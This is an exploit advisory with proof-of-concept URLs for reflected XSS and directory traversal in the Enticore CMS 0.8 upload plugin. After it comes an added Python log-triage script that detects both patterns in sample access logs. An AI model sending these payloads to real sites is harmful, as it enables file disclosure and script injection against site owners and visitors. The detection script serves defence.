# Exploit Title: Enticore CMS Directory Traversal (logged only)
# Google Dork:
# Date: 24.09.2011
# Author: Jakub Galczyk /
# Software Link: http://sourceforge.net/projects/enticore/
# Version: 0.8
# Tested on: Ubuntu 10.10
# CVE :
PoC XSS:
http://enticore.sourceforge.net/index.php?plugin=EnticorePluginUpload&site=<script>alert(123)</script>&dir=yo
PoC DT:
http://enticore-0.8/index.php?plugin=EnticorePluginUpload&site=upload&dir=../../../../../../../../../../../../../home/
# best regards from
# http://hauntit.wordpress.com/
#
--
Jakub Gałczyk
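
Added example (not part of the original advisory, and not Enticore code): a log triage script that flags requests to the EnticorePluginUpload plugin whose `dir` parameter contains parent-directory segments or whose `site` parameter contains markup characters, the two patterns in the PoC URLs above. The sample log lines, the Apache-style log format and all function names are assumptions constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Sep/2011:10:00:01 +0000] "GET /index.php?plugin=EnticorePluginUpload&site=upload&dir=images HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Sep/2011:10:00:09 +0000] "GET /index.php?plugin=EnticorePluginUpload&site=upload&dir=..%2F..%2F..%2Fhome%2F HTTP/1.1" 200 2048',
    '198.51.100.9 - - [24/Sep/2011:10:01:30 +0000] "GET /index.php?plugin=EnticorePluginUpload&site=%3Cscript%3Ealert(123)%3C/script%3E&dir=yo HTTP/1.1" 200 733',
    '198.51.100.9 - - [24/Sep/2011:10:02:00 +0000] "GET /index.php?plugin=Other&site=home HTTP/1.1" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A ".." path segment delimited by a slash, a backslash or the string boundary.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# Characters that have no place in a page name and enable markup injection.
MARKUP_RE = re.compile(r'[<>"\']')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a sorted list of findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "EnticorePluginUpload" not in query.get("plugin", []):
        return []
    findings = set()
    for raw in query.get("dir", []):
        if TRAVERSAL_RE.search(decode_fully(raw)):
            findings.add("dir-traversal")
    for raw in query.get("site", []):
        if MARKUP_RE.search(decode_fully(raw)):
            findings.add("site-markup")
    return sorted(findings)

def scan(lines):
    """Return (line_index, findings) for every line with at least one finding."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]
```
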